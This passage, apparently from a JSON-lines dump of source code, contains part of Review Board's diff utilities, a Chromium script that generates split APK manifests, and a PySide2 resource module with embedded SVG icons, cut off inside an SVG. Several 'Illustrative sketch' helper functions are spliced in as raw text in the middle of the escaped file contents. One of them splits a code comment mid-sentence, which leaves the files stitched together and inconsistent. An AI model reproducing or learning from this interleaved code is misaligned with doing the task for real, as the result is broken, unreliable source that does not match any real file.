lines) and returns the human-readable line numbers, the chunks they're in,\n and mapped virtual line numbers.\n\n A virtual line range may start or end in a chunk not containing displayed\n line numbers (such as an \"original\" range starting/ending in an \"insert\"\n chunk). The resulting displayed line ranges will exclude these chunks.\n\n Args:\n chunks (list of dict):\n The list of chunks for the diff.\n\n first_vlinenum (int):\n The first virtual line number. This uses 1-based indexes.\n\n last_vlinenum (int):\n The last virtual line number. 
This uses 1-based indexes.\n\n Returns:\n tuple:\n A tuple of displayed line range information, containing 2 items.\n\n Each item will either be a dictionary of information, or ``None``\n if there aren't any displayed lines to show.\n\n The dictionary contains the following keys:\n\n ``display_range``:\n A tuple containing the displayed line range.\n\n ``virtual_range``:\n A tuple containing the virtual line range that ``display_range``\n maps to.\n\n ``chunk_range``:\n A tuple containing the beginning/ending chunks that\n ``display_range`` maps to.\n\n Raises:\n ValueError:\n The range provided was invalid.\n \"\"\"\n if first_vlinenum < 0:\n raise ValueError('first_vlinenum must be >= 0')\n\n if last_vlinenum < first_vlinenum:\n raise ValueError('last_vlinenum must be >= first_vlinenum')\n\n orig_start_linenum = None\n orig_end_linenum = None\n orig_start_chunk = None\n orig_last_valid_chunk = None\n patched_start_linenum = None\n patched_end_linenum = None\n patched_start_chunk = None\n patched_last_valid_chunk = None\n\n for chunk in chunks:\n lines = chunk['lines']\n\n if not lines:\n logging.warning('get_displayed_diff_line_ranges: Encountered '\n 'empty chunk %r',\n chunk)\n continue\n\n first_line = lines[0]\n last_line = lines[-1]\n chunk_first_vlinenum = first_line[0]\n chunk_last_vlinenum = last_line[0]\n\n if first_vlinenum > chunk_last_vlinenum:\n # We're too early. There won't be anything of interest here.\n continue\n\n if last_vlinenum < chunk_first_vlinenum:\n # We're not going to find anything useful at this point, so bail.\n break\n\n change = chunk['change']\n valid_for_orig = (change != 'insert' and first_line[1])\n valid_for_patched = (change != 'delete' and first_line[4])\n\n if valid_for_orig:\n orig_last_valid_chunk = chunk\n\n if not orig_start_chunk:\n orig_start_chunk = chunk\n\n if valid_for_patched:\n patched_last_valid_chunk = chunk\n\n if not patched_start_chunk:\n patched_start_chunk = chunk\n\n if chunk_first_vlinenum <= first_vlinenum <= chunk_last_vlinenum:\n # This chunk contains the first line that can possibly be used for\n # the comment range. We know the start and end virtual line numbers\n # in the range, so we can compute the proper offset.\n offset = first_vlinenum - chunk_first_vlinenum\n\n if valid_for_orig:\n orig_start_linenum = first_line[1] + offset\n orig_start_vlinenum = first_line[0] + offset\n\n if valid_for_patched:\n patched_start_linenum = first_line[4] + offset\n patched_start_vlinenum = first_line[0] + offset\n elif first_vlinenum < chunk_first_vlinenum:\n # One side of the the comment range may not have started in a valid\n # chunk (this would happen if a comment began in an insert or\n # delete chunk). If that happened, we may not have been able to set\n # the beginning of the range in the condition above. Check for this\n # and try setting it now.\n if orig_start_linenum is None and valid_for_orig:\n orig_start_linenum = first_line[1]\n orig_start_vlinenum = first_line[0]\n\n if patched_start_linenum is None and valid_for_patched:\n patched_start_linenum = first_line[4]\n patched_start_vlinenum = first_line[0]\n\n # Figure out the end ranges, now that we know the valid ending chunks of\n # each. 
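# Illustrative sketch (not part of the original module): what
# get_line_changed_regions(), defined earlier in this file, reports for two
# similar lines. The sample strings are made up.
def _demo_line_changed_regions():
    old = 'value = compute(a, b)'
    new = 'value = compute(a, c)'

    # Both sides differ only in the final argument, so each returned list
    # contains a single (start, end) range covering that character. Lines
    # that are too dissimilar (SequenceMatcher ratio below 0.6) yield
    # (None, None) instead.
    return get_line_changed_regions(old, new)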
We're going to try to get the line within the chunk that represents\n # the end, if within the chunk, capping it to the last line in the chunk.\n #\n # If a particular range did not have a valid chunk anywhere in that range,\n # we're going to invalidate the entire range.\n if orig_last_valid_chunk:\n lines = orig_last_valid_chunk['lines']\n first_line = lines[0]\n last_line = lines[-1]\n offset = last_vlinenum - first_line[0]\n\n orig_end_linenum = min(last_line[1], first_line[1] + offset)\n orig_end_vlinenum = min(last_line[0], first_line[0] + offset)\n\n assert orig_end_linenum >= orig_start_linenum\n assert orig_end_vlinenum >= orig_start_vlinenum\n\n orig_range_info = {\n 'display_range': (orig_start_linenum, orig_end_linenum),\n 'virtual_range': (orig_start_vlinenum, orig_end_vlinenum),\n 'chunk_range': (orig_start_chunk, orig_last_valid_chunk),\n }\n else:\n orig_range_info = None\n\n if patched_last_valid_chunk:\n lines = patched_last_valid_chunk['lines']\n first_line = lines[0]\n last_line = lines[-1]\n offset = last_vlinenum - first_line[0]\n\n patched_end_linenum = min(last_line[4], first_line[4] + offset)\n patched_end_vlinenum = min(last_line[0], first_line[0] + offset)\n\n assert patched_end_linenum >= patched_start_linenum\n assert patched_end_vlinenum >= patched_start_vlinenum\n\n patched_range_info = {\n 'display_range': (patched_start_linenum, patched_end_linenum),\n 'virtual_range': (patched_start_vlinenum, patched_end_vlinenum),\n 'chunk_range': (patched_start_chunk, patched_last_valid_chunk),\n }\n else:\n patched_range_info = None\n\n return orig_range_info, patched_range_info\n\n\ndef get_diff_data_chunks_info(diff):\n \"\"\"Return information on each chunk in a diff.\n\n This will scan through a unified diff file, looking for each chunk in the\n diff and returning information on their ranges and lines of context. This\n can be used to generate statistics on diffs and help map changed regions\n in diffs to lines of source files.\n\n Args:\n diff (bytes):\n The diff data to scan.\n\n Returns:\n list of dict:\n A list of chunk information dictionaries. Each entry has an ``orig``\n and ``modified` dictionary containing the following keys:\n\n ``chunk_start`` (``int``):\n The starting line number of the chunk shown in the diff, including\n any lines of context. This is 0-based.\n\n ``chunk_len`` (``int``):\n The length of the chunk shown in the diff, including any lines of\n context.\n\n ``changes_start`` (``int``):\n The starting line number of a range of changes shown in a chunk in\n the diff.\n This is after any lines of context and is 0-based.\n\n ``changes_len`` (``int``):\n The length of the changes shown in a chunk in the diff, excluding\n any lines of context.\n\n ``pre_lines_of_context`` (``int``):\n The number of lines of context before any changes in a chunk. If\n the chunk doesn't have any changes, this will contain all lines of\n context otherwise shown around changes in the other region in this\n entry.\n\n ``post_lines_of_context`` (``int``):\n The number of lines of context after any changes in a chunk. 
If\n the chunk doesn't have any changes, this will be 0.\n \"\"\"\n def _finalize_result():\n if not cur_result:\n return\n\n for result_dict, unchanged_lines in ((cur_result_orig,\n orig_unchanged_lines),\n (cur_result_modified,\n modified_unchanged_lines)):\n result_dict['changes_len'] -= unchanged_lines\n\n if result_dict['changes_len'] == 0:\n assert result_dict['pre_lines_of_context'] == 0\n result_dict['pre_lines_of_context'] = unchanged_lines\n else:\n result_dict['post_lines_of_context'] = unchanged_lines\n\n process_orig_changes = False\n process_modified_changes = False\n\n results = []\n cur_result = None\n cur_result_orig = None\n cur_result_modified = None\n\n orig_unchanged_lines = 0\n modified_unchanged_lines = 0\n\n # Look through the chunks of the diff, trying to find the amount\n # of context shown at the beginning of each chunk. Though this\n # will usually be 3 lines, it may be fewer or more, depending\n # on file length and diff generation settings.\n for i, line in enumerate(split_line_endings(diff.strip())):\n if line.startswith(b'-'):\n if process_orig_changes:\n # We've found the first change in the original side of the\n # chunk. We now know how many lines of context we have here.\n #\n # We reduce the indexes by 1 because the chunk ranges\n # in diffs start at 1, and we want a 0-based index.\n cur_result_orig['pre_lines_of_context'] = orig_unchanged_lines\n cur_result_orig['changes_start'] += orig_unchanged_lines\n cur_result_orig['changes_len'] -= orig_unchanged_lines\n process_orig_changes = False\n\n orig_unchanged_lines = 0\n elif line.startswith(b'+'):\n if process_modified_changes:\n # We've found the first change in the modified side of the\n # chunk. We now know how many lines of context we have here.\n #\n # We reduce the indexes by 1 because the chunk ranges\n # in diffs start at 1, and we want a 0-based index.\n cur_result_modified['pre_lines_of_context'] = \\\n modified_unchanged_lines\n cur_result_modified['changes_start'] += \\\n modified_unchanged_lines\n cur_result_modified['changes_len'] -= modified_unchanged_lines\n process_modified_changes = False\n\n modified_unchanged_lines = 0\n elif line.startswith(b' '):\n # We might be before a group of changes, inside a group of changes,\n # or after a group of changes. Either way, we want to track these\n # values.\n orig_unchanged_lines += 1\n modified_unchanged_lines += 1\n else:\n # This was not a change within a chunk, or we weren't processing,\n # so check to see if this is a chunk header instead.\n m = CHUNK_RANGE_RE.match(line)\n\n if m:\n # It is a chunk header. Start by updating the previous range\n # to factor in the lines of trailing context.\n _finalize_result()\n\n # Next, reset the state for the next range, and pull the line\n # numbers and lengths from the header. 
We'll also normalize\n # the starting locations to be 0-based.\n orig_start = int(m.group('orig_start')) - 1\n orig_len = int(m.group('orig_len') or '1')\n modified_start = int(m.group('modified_start')) - 1\n modified_len = int(m.group('modified_len') or '1')\n\n cur_result_orig = {\n 'pre_lines_of_context': 0,\n 'post_lines_of_context': 0,\n 'chunk_start': orig_start,\n 'chunk_len': orig_len,\n 'changes_start': orig_start,\n 'changes_len': orig_len,\n }\n cur_result_modified = {\n 'pre_lines_of_context': 0,\n 'post_lines_of_context': 0,\n 'chunk_start': modified_start,\n 'chunk_len': modified_len,\n 'changes_start': modified_start,\n 'changes_len': modified_len,\n }\n cur_result = {\n 'orig': cur_result_orig,\n 'modified': cur_result_modified,\n }\n results.append(cur_result)\n\n process_orig_changes = True\n process_modified_changes = True\n orig_unchanged_lines = 0\n modified_unchanged_lines = 0\n else:\n logging.warning('Unexpected content on line %d of diff: \"%s\"',\n i, line)\n\n # We need to adjust the last range, if we're still processing\n # trailing context.\n _finalize_result()\n\n return results\n\n\ndef check_diff_size(diff_file, parent_diff_file=None):\n \"\"\"Check the size of the given diffs against the maximum allowed size.\n\n If either of the provided diffs are too large, an exception will be raised.\n\n Args:\n diff_file (django.core.files.uploadedfile.UploadedFile):\n The diff file.\n\n parent_diff_file (django.core.files.uploadedfile.UploadedFile,\n optional):\n The parent diff file, if any.\n\n Raises:\n reviewboard.diffviewer.errors.DiffTooBigError:\n The supplied files are too big.\n \"\"\"\n siteconfig = SiteConfiguration.objects.get_current()\n max_diff_size = siteconfig.get('diffviewer_max_diff_size')\n\n if max_diff_size > 0:\n if diff_file.size > max_diff_size:\n raise DiffTooBigError(\n _('The supplied diff file is too large.'),\n max_diff_size=max_diff_size)\n\n if parent_diff_file and parent_diff_file.size > max_diff_size:\n raise DiffTooBigError(\n _('The supplied parent diff file is too large.'),\n max_diff_size=max_diff_size)\n\n\ndef get_total_line_counts(files_qs):\n \"\"\"Return the total line counts of all given FileDiffs.\n\n Args:\n files_qs (django.db.models.query.QuerySet):\n The queryset descripting the :py:class:`FileDiffs\n <reviewboard.diffviewer.models.filediff.FileDiff>`.\n\n Returns:\n dict:\n A dictionary with the following keys:\n\n * ``raw_insert_count``\n * ``raw_delete_count``\n * ``insert_count``\n * ``delete_count``\n * ``replace_count``\n * ``equal_count``\n * ``total_line_count``\n\n Each entry maps to the sum of that line count type for all\n :py:class:`FileDiffs\n <reviewboard.diffviewer.models.filediff.FileDiff>`.\n \"\"\"\n counts = {\n 'raw_insert_count': 0,\n 'raw_delete_count': 0,\n 'insert_count': 0,\n 'delete_count': 0,\n 'replace_count': None,\n 'equal_count': None,\n 'total_line_count': None,\n }\n\n for filediff in files_qs:\n for key, value in six.iteritems(filediff.get_line_counts()):\n if value is not None:\n if counts[key] is None:\n counts[key] = value\n else:\n counts[key] += value\n\n return counts\n"} {"ext": "py", "sha": "1a312eda6ac15637aaa3e935fa431e5e20ceeeaf", "content": "#!/usr/bin/env python\n#\n# Copyright 2015 The Chromium Authors. 
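# Illustrative sketch (not part of either file here): feeding a tiny unified
# diff to get_diff_data_chunks_info() from the diff utilities above. The
# import path assumes those utilities live in
# reviewboard.diffviewer.diffutils; the diff content is made up.
def _demo_chunk_ranges():
    from reviewboard.diffviewer.diffutils import get_diff_data_chunks_info

    diff = (b'--- a/file\n'
            b'+++ b/file\n'
            b'@@ -1,3 +1,3 @@\n'
            b' context\n'
            b'-old line\n'
            b'+new line\n'
            b' context\n')

    # Returns one entry per chunk, each with 'orig' and 'modified' dicts
    # reporting 0-based chunk/change ranges and the lines of leading and
    # trailing context.
    return get_diff_data_chunks_info(diff)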
All rights reserved.\n# Use of this source code is governed by a BSD-style license that can be\n# found in the LICENSE file.\n\"\"\"Creates an AndroidManifest.xml for an APK split.\n\nGiven the manifest file for the main APK, generates an AndroidManifest.xml with\nthe value required for a Split APK (package, versionCode, etc).\n\"\"\"\n\nimport lxml.etree\nimport optparse\n\nfrom util import build_utils\n\nMANIFEST_TEMPLATE = \"\"\"<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<manifest\n xmlns:android=\"http://schemas.android.com/apk/res/android\"\n package=\"%(package)s\"\n split=\"%(split)s\">\n <uses-sdk android:minSdkVersion=\"21\" />\n <application android:hasCode=\"%(has_code)s\">\n </application>\n</manifest>\n\"\"\"\n\ndef ParseArgs():\n \"\"\"Parses command line options.\n\n Returns:\n An options object as from optparse.OptionsParser.parse_args()\n \"\"\"\n parser = optparse.OptionParser()\n build_utils.AddDepfileOption(parser)\n parser.add_option('--main-manifest', help='The main manifest of the app')\n parser.add_option('--out-manifest', help='The output manifest')\n parser.add_option('--split', help='The name of the split')\n parser.add_option(\n '--has-code',\n action='store_true',\n default=False,\n help='Whether the split will contain a .dex file')\n\n (options, args) = parser.parse_args()\n\n if args:\n parser.error('No positional arguments should be given.')\n\n # Check that required options have been provided.\n required_options = ('main_manifest', 'out_manifest', 'split')\n build_utils.CheckOptions(options, parser, required=required_options)\n\n return options\n\n\ndef Build(main_manifest, split, has_code):\n \"\"\"Builds a split manifest based on the manifest of the main APK.\n\n Args:\n main_manifest: the XML manifest of the main APK as a string\n split: the name of the split as a string\n has_code: whether this split APK will contain .dex files\n\n Returns:\n The XML split manifest as a string\n \"\"\"\n\n doc = lxml.etree.fromstring(main_manifest)\n package = doc.xpath('/manifest/@package')[0]\n\n return MANIFEST_TEMPLATE % {\n 'package': package,\n 'split': split.replace('-', '_'),\n 'has_code': str(has_code).lower()\n }\n\n\ndef main():\n options = ParseArgs()\n main_manifest = file(options.main_manifest).read()\n split_manifest = Build(\n main_manifest,\n options.split,\n options.has_code)\n\n with file(options.out_manifest, 'w') as f:\n f.write(split_manifest)\n\n if options.depfile:\n build_utils.WriteDepfile(\n options.depfile,\n [main_manifest] + build_utils.GetPythonDependencies())\n\n\nif __name__ == '__main__':\n main()\n"} {"ext": "py", "sha": "1a312eebb329222b44e1ab3e86642b05d53bed49", "content": "# -*- coding: utf-8 -*-\n\n# Resource object code\n#\n# Created: Mon Dec 9 12:39:51 2019\n# by: The Resource Compiler for PySide2 (Qt v5.13.0)\n#\n# WARNING! 
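# Illustrative sketch (not part of the generated resource module below or the
# split-manifest script above): how Build() from that script assembles a
# split manifest from a minimal main manifest, assuming Build() is in scope.
# The package name and split name are made up.
def _demo_build_split_manifest():
    main_manifest = (
        '<manifest xmlns:android='
        '"http://schemas.android.com/apk/res/android" '
        'package="com.example.app"/>')

    # Build() reads the package attribute via XPath, substitutes it into
    # MANIFEST_TEMPLATE, and replaces '-' with '_' in the split name.
    return Build(main_manifest, split='extra-assets', has_code=False)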
All changes made in this file will be lost!\n\nfrom PySide2 import QtCore\n\nqt_resource_data = b\"\\\n\\x00\\x00\\x10\\xcd\\\n<\\\n?xml version=\\x221.\\\n0\\x22 encoding=\\x22UTF\\\n-8\\x22 standalone=\\x22\\\nno\\x22?>\\x0a<svg\\x0a xm\\\nlns:dc=\\x22http://p\\\nurl.org/dc/eleme\\\nnts/1.1/\\x22\\x0a xml\\\nns:cc=\\x22http://cr\\\neativecommons.or\\\ng/ns#\\x22\\x0a xmlns:\\\nrdf=\\x22http://www.\\\nw3.org/1999/02/2\\\n2-rdf-syntax-ns#\\\n\\x22\\x0a xmlns:svg=\\x22\\\nhttp://www.w3.or\\\ng/2000/svg\\x22\\x0a x\\\nmlns=\\x22http://www\\\n.w3.org/2000/svg\\\n\\x22\\x0a xmlns:sodip\\\nodi=\\x22http://sodi\\\npodi.sourceforge\\\n.net/DTD/sodipod\\\ni-0.dtd\\x22\\x0a xmln\\\ns:inkscape=\\x22http\\\n://www.inkscape.\\\norg/namespaces/i\\\nnkscape\\x22\\x0a widt\\\nh=\\x2248\\x22\\x0a height\\\n=\\x2248\\x22\\x0a viewBox\\\n=\\x220 0 48 48\\x22\\x0a \\\nversion=\\x221.1\\x22\\x0a \\\n id=\\x22svg6\\x22\\x0a so\\\ndipodi:docname=\\x22\\\nzoom_default.svg\\\n\\x22\\x0a inkscape:ve\\\nrsion=\\x220.92.4 (u\\\nnknown)\\x22>\\x0a <met\\\nadata\\x0a id=\\x22m\\\netadata12\\x22>\\x0a \\\n<rdf:RDF>\\x0a \\\n<cc:Work\\x0a \\\n rdf:about=\\x22\\x22>\\x0a\\\n <dc:form\\\nat>image/svg+xml\\\n</dc:format>\\x0a \\\n <dc:type\\x0a \\\n rdf:res\\\nource=\\x22http://pu\\\nrl.org/dc/dcmity\\\npe/StillImage\\x22 /\\\n>\\x0a <dc:ti\\\ntle />\\x0a </c\\\nc:Work>\\x0a </rd\\\nf:RDF>\\x0a </metad\\\nata>\\x0a <defs\\x0a \\\n id=\\x22defs10\\x22 />\\\n\\x0a <sodipodi:nam\\\nedview\\x0a page\\\ncolor=\\x22#ffffff\\x22\\x0a\\\n bordercolor\\\n=\\x22#666666\\x22\\x0a \\\nborderopacity=\\x221\\\n\\x22\\x0a objecttol\\\nerance=\\x2210\\x22\\x0a \\\n gridtolerance=\\x22\\\n10\\x22\\x0a guideto\\\nlerance=\\x2210\\x22\\x0a \\\n inkscape:pageo\\\npacity=\\x220\\x22\\x0a \\\ninkscape:pagesha\\\ndow=\\x222\\x22\\x0a ink\\\nscape:window-wid\\\nth=\\x22902\\x22\\x0a in\\\nkscape:window-he\\\night=\\x22427\\x22\\x0a \\\nid=\\x22namedview8\\x22\\x0a\\\n showgrid=\\x22f\\\nalse\\x22\\x0a inksc\\\nape:zoom=\\x223.4766\\\n083\\x22\\x0a inksca\\\npe:cx=\\x2223.055426\\\n\\x22\\x0a inkscape:\\\ncy=\\x2232.605698\\x22\\x0a \\\n inkscape:win\\\ndow-x=\\x22783\\x22\\x0a \\\n inkscape:window\\\n-y=\\x22162\\x22\\x0a in\\\nkscape:window-ma\\\nximized=\\x220\\x22\\x0a \\\n inkscape:curren\\\nt-layer=\\x22layer1\\x22\\\n />\\x0a <path\\x0a \\\n d=\\x22M0 0h48v48h-\\\n48z\\x22\\x0a id=\\x22pa\\\nth2\\x22\\x0a fill=\\x22\\\nnone\\x22 />\\x0a <circ\\\nle\\x0a style=\\x22o\\\npacity:1;fill:#9\\\n99999;fill-opaci\\\nty:1;stroke:none\\\n;stroke-width:17\\\n.22429085;stroke\\\n-linecap:round;s\\\ntroke-linejoin:b\\\nevel;stroke-mite\\\nrlimit:4;stroke-\\\ndasharray:none;s\\\ntroke-dashoffset\\\n:0;stroke-opacit\\\ny:1;paint-order:\\\nnormal\\x22\\x0a id=\\\n\\x22path1093\\x22\\x0a \\\ncx=\\x2218.237631\\x22\\x0a \\\n cy=\\x2217.87515\\\n4\\x22\\x0a r=\\x2214.58\\\n8048\\x22 />\\x0a <path\\\n\\x0a style=\\x22fil\\\nl:#b3b3b3;fill-r\\\nule:evenodd;stro\\\nke:#999999;strok\\\ne-width:7;stroke\\\n-linecap:round;s\\\ntroke-linejoin:m\\\niter;stroke-mite\\\nrlimit:4;stroke-\\\ndasharray:none;s\\\ntroke-opacity:1\\x22\\\n\\x0a d=\\x22M 23.46\\\n1607,23.808476 4\\\n0.458238,41.4307\\\n5\\x22\\x0a id=\\x22path\\\n1095\\x22\\x0a inksc\\\nape:connector-cu\\\nrvature=\\x220\\x22\\x0a \\\n sodipodi:nodety\\\npes=\\x22cc\\x22 />\\x0a <c\\\nircle\\x0a 
style\\\n=\\x22opacity:1;fill\\\n:#e6e6e6;fill-op\\\nacity:1;stroke:n\\\none;stroke-width\\\n:15.31822777;str\\\noke-linecap:roun\\\nd;stroke-linejoi\\\nn:bevel;stroke-m\\\niterlimit:4;stro\\\nke-dasharray:non\\\ne;stroke-dashoff\\\nset:0;stroke-opa\\\ncity:1;paint-ord\\\ner:normal\\x22\\x0a \\\nid=\\x22path1093-3\\x22\\x0a\\\n cx=\\x2218.1563\\\n38\\x22\\x0a cy=\\x2217.\\\n843712\\x22\\x0a r=\\x22\\\n12.973715\\x22 />\\x0a \\\n<g\\x0a transfor\\\nm=\\x22matrix(0.5084\\\n7458,0,0,0.50847\\\n458,15.118648,-5\\\n05.88314)\\x22\\x0a \\\nid=\\x22layer1\\x22\\x0a \\\n inkscape:label=\\\n\\x22Capa 1\\x22\\x0a st\\\nyle=\\x22stroke:#00d\\\n4aa\\x22>\\x0a <g\\x0a \\\n id=\\x22g836\\x22\\x0a \\\n transform=\\x22\\\nmatrix(0.6818019\\\n5,0,0,0.68180195\\\n,-10.748023,329.\\\n76841)\\x22>\\x0a <\\\nrect\\x0a st\\\nyle=\\x22fill:none;f\\\nill-opacity:0.84\\\n951453;stroke:#0\\\n0d4aa;stroke-wid\\\nth:3.85741425;st\\\nroke-linejoin:ro\\\nund;stroke-miter\\\nlimit:4;stroke-d\\\nasharray:none\\x22\\x0a \\\n id=\\x22rect\\\n4136\\x22\\x0a w\\\nidth=\\x2244.142586\\x22\\\n\\x0a height\\\n=\\x2244.142586\\x22\\x0a \\\n x=\\x221.92870\\\n71\\x22\\x0a y=\\x22\\\n1006.2909\\x22\\x0a \\\n ry=\\x2210.18675\\\n1\\x22 />\\x0a <g\\x0a \\\n id=\\x22g415\\\n7\\x22\\x0a tran\\\nsform=\\x22matrix(0.\\\n84603094,0,0,0.7\\\n8857975,5.043487\\\n2,217.0903)\\x22\\x0a \\\n style=\\x22fil\\\nl:#999999;stroke\\\n:#00d4aa\\x22>\\x0a \\\n <path\\x0a \\\n sodipodi:nod\\\netypes=\\x22ccc\\x22\\x0a \\\n inkscape\\\n:connector-curva\\\nture=\\x220\\x22\\x0a \\\n id=\\x22path4138\\\n\\x22\\x0a d=\\x22\\\nm 9.1882493,1043\\\n.1259 28.1788757\\\n,-28.9184 v 0\\x22\\x0a \\\n style=\\\n\\x22fill:#999999;fi\\\nll-rule:evenodd;\\\nstroke:#00d4aa;s\\\ntroke-width:4.74\\\n617958;stroke-li\\\nnecap:butt;strok\\\ne-linejoin:miter\\\n;stroke-miterlim\\\nit:4;stroke-dash\\\narray:none;strok\\\ne-opacity:1\\x22 />\\x0a\\\n <path\\x0a \\\n sodipod\\\ni:nodetypes=\\x22ccc\\\nc\\x22\\x0a in\\\nkscape:connector\\\n-curvature=\\x220\\x22\\x0a \\\n id=\\x22pa\\\nth4140-3\\x22\\x0a \\\n d=\\x22m 38.871\\\n283,1019.5549 -6\\\n.563179,-7.2978 \\\n8.297448,-1.8083\\\n z\\x22\\x0a s\\\ntyle=\\x22fill:#00d4\\\naa;fill-rule:eve\\\nnodd;stroke:#00d\\\n4aa;stroke-width\\\n:1px;stroke-line\\\ncap:butt;stroke-\\\nlinejoin:miter;s\\\ntroke-opacity:1\\x22\\\n />\\x0a <pat\\\nh\\x0a sod\\\nipodi:nodetypes=\\\n\\x22cccc\\x22\\x0a \\\n inkscape:conne\\\nctor-curvature=\\x22\\\n0\\x22\\x0a id\\\n=\\x22path4140-3-6\\x22\\x0a\\\n d=\\x22m \\\n6.8693068,1038.4\\\n258 6.5632192,7.\\\n2979 -8.2974502,\\\n1.8083 z\\x22\\x0a \\\n style=\\x22fill\\\n:#00d4aa;fill-ru\\\nle:evenodd;strok\\\ne:#00d4aa;stroke\\\n-width:1px;strok\\\ne-linecap:butt;s\\\ntroke-linejoin:m\\\niter;stroke-opac\\\nity:1\\x22 />\\x0a \\\n</g>\\x0a </g>\\x0a \\\n</g>\\x0a</svg>\\x0a\\\n\\x00\\x00\\x07\\xa4\\\n<\\\n?xml version=\\x221.\\\n0\\x22 encoding=\\x22UTF\\\n-8\\x22 standalone=\\x22\\\nno\\x22?>\\x0a<!-- Creat\\\ned with Inkscape\\\n (http://www.ink\\\nscape.org/) -->\\x0a\\\n\\x0a<svg\\x0a xmlns:d\\\nc=\\x22http://purl.o\\\nrg/dc/elements/1\\\n.1/\\x22\\x0a xmlns:cc\\\n=\\x22http://creativ\\\necommons.org/ns#\\\n\\x22\\x0a xmlns:rdf=\\x22\\\nhttp://www.w3.or\\\ng/1999/02/22-rdf\\\n-syntax-ns#\\x22\\x0a \\\nxmlns:svg=\\x22http:\\\n//www.w3.org/200\\\n0/svg\\x22\\x0a xmlns=\\\n\\x22http://www.w3.o\\\nrg/2000/svg\\x22\\x0a \\\nxmlns:sodipodi=\\x22\\\nhttp://sodipodi.\\\nsourceforge.net/\\\nDTD/sodipodi-0.d\\\ntd\\x22\\x0a 
xmlns:ink\\\nscape=\\x22http://ww\\\nw.inkscape.org/n\\\namespaces/inksca\\\npe\\x22\\x0a version=\\x22\\\n1.1\\x22\\x0a id=\\x22svg2\\\n\\x22\\x0a width=\\x22192\\x22\\\n\\x0a height=\\x22192\\x22\\\n\\x0a viewBox=\\x220 0\\\n 192 192\\x22\\x0a sod\\\nipodi:docname=\\x22s\\\navec.svg\\x22\\x0a ink\\\nscape:version=\\x220\\\n.92.2 (5c3e80d, \\\n2017-08-06)\\x22>\\x0a \\\n<metadata\\x0a i\\\nd=\\x22metadata8\\x22>\\x0a \\\n <rdf:RDF>\\x0a \\\n <cc:Work\\x0a \\\n rdf:about=\\x22\\\n\\x22>\\x0a <dc:f\\\normat>image/svg+\\\nxml</dc:format>\\x0a\\\n <dc:type\\\n\\x0a rdf:\\\nresource=\\x22http:/\\\n/purl.org/dc/dcm\\\nitype/StillImage\\\n\\x22 />\\x0a <dc\\\n:title />\\x0a \\\n</cc:Work>\\x0a <\\\n/rdf:RDF>\\x0a </me\\\ntadata>\\x0a <defs\\x0a\\\n id=\\x22defs6\\x22 \\\n/>\\x0a <sodipodi:n\\\namedview\\x0a pa\\\ngecolor=\\x22#ffffff\\\n\\x22\\x0a bordercol\\\nor=\\x22#666666\\x22\\x0a \\\n borderopacity=\\\n\\x221\\x22\\x0a objectt\\\nolerance=\\x2210\\x22\\x0a \\\n gridtolerance\\\n=\\x2210\\x22\\x0a guide\\\ntolerance=\\x2210\\x22\\x0a \\\n inkscape:pag\\\neopacity=\\x220\\x22\\x0a \\\n inkscape:pages\\\nhadow=\\x222\\x22\\x0a i\\\nnkscape:window-w\\\nidth=\\x221503\\x22\\x0a \\\n inkscape:window\\\n-height=\\x22616\\x22\\x0a \\\n id=\\x22namedview\\\n4\\x22\\x0a showgrid\\\n=\\x22false\\x22\\x0a in\\\nkscape:zoom=\\x221.2\\\n291667\\x22\\x0a ink\\\nscape:cx=\\x22-192\\x22\\x0a\\\n inkscape:cy\\\n=\\x2296.000006\\x22\\x0a \\\n inkscape:windo\\\nw-x=\\x2257\\x22\\x0a in\\\nkscape:window-y=\\\n\\x2227\\x22\\x0a inksca\\\npe:window-maximi\\\nzed=\\x220\\x22\\x0a ink\\\nscape:current-la\\\nyer=\\x22svg2\\x22 />\\x0a \\\n<path\\x0a style\\\n=\\x22fill:#5555ff;s\\\ntroke-width:1.33\\\n333337\\x22\\x0a d=\\x22\\\nm 37.559322,153.\\\n62712 v -8 h 56 \\\n55.999998 v 8 8 \\\nh -55.999998 -56\\\n z m 28,-52.6666\\\n7 -27.30894,-27.\\\n333331 h 15.6544\\\n71 15.654469 v -\\\n24 -24 h 24 23.9\\\n99998 v 24 24 h \\\n15.65447 15.6544\\\n6 l -27.30893,27\\\n.333331 c -15.01\\\n992,15.03334 -27\\\n.619918,27.33334\\\n -27.999998,27.3\\\n3334 -0.38008,0 \\\n-12.98008,-12.3 \\\n-28,-27.33334 z\\x22\\\n\\x0a id=\\x22path81\\\n7\\x22\\x0a inkscape\\\n:connector-curva\\\nture=\\x220\\x22 />\\x0a</sv\\\ng>\\x0a\\\n\\x00\\x02\\xb4\\x85\\\n<\\\n?xml version=\\x221.\\\n0\\x22 encoding=\\x22UTF\\\n-8\\x22 standalone=\\x22\\\nno\\x22?>\\x0a<!-- Creat\\\ned with Inkscape\\\n (http://www.ink\\\nscape.org/) -->\\x0a\\\n\\x0a<svg\\x0a xmlns:d\\\nc=\\x22http://purl.o\\\nrg/dc/elements/1\\\n.1/\\x22\\x0a xmlns:cc\\\n=\\x22http://creativ\\\necommons.org/ns#\\\n\\x22\\x0a xmlns:rdf=\\x22\\\nhttp://www.w3.or\\\ng/1999/02/22-rdf\\\n-syntax-ns#\\x22\\x0a \\\nxmlns:svg=\\x22http:\\\n//www.w3.org/200\\\n0/svg\\x22\\x0a xmlns=\\\n\\x22http://www.w3.o\\\nrg/2000/svg\\x22\\x0a \\\nxmlns:xlink=\\x22htt\\\np://www.w3.org/1\\\n999/xlink\\x22\\x0a xm\\\nlns:sodipodi=\\x22ht\\\ntp://sodipodi.so\\\nurceforge.net/DT\\\nD/sodipodi-0.dtd\\\n\\x22\\x0a xmlns:inksc\\\nape=\\x22http://www.\\\ninkscape.org/nam\\\nespaces/inkscape\\\n\\x22\\x0a width=\\x2248\\x22\\x0a\\\n height=\\x2248\\x22\\x0a \\\n viewBox=\\x220 0 4\\\n8.000001 48.0000\\\n01\\x22\\x0a id=\\x22svg2\\x22\\\n\\x0a version=\\x221.1\\\n\\x22\\x0a inkscape:ve\\\nrsion=\\x220.92.4 (u\\\nnknown)\\x22\\x0a sodi\\\npodi:docname=\\x22ma\\\np (night).svg\\x22>\\x0a\\\n <defs\\x0a id=\\\n\\x22defs4\\x22>\\x0a <cl\\\nipPath\\x0a cl\\\nipPathUnits=\\x22use\\\nrSpaceOnUse\\x22\\x0a \\\n id=\\x22clipPath\\\n825\\x22>\\x0a <rec\\\nt\\x0a 
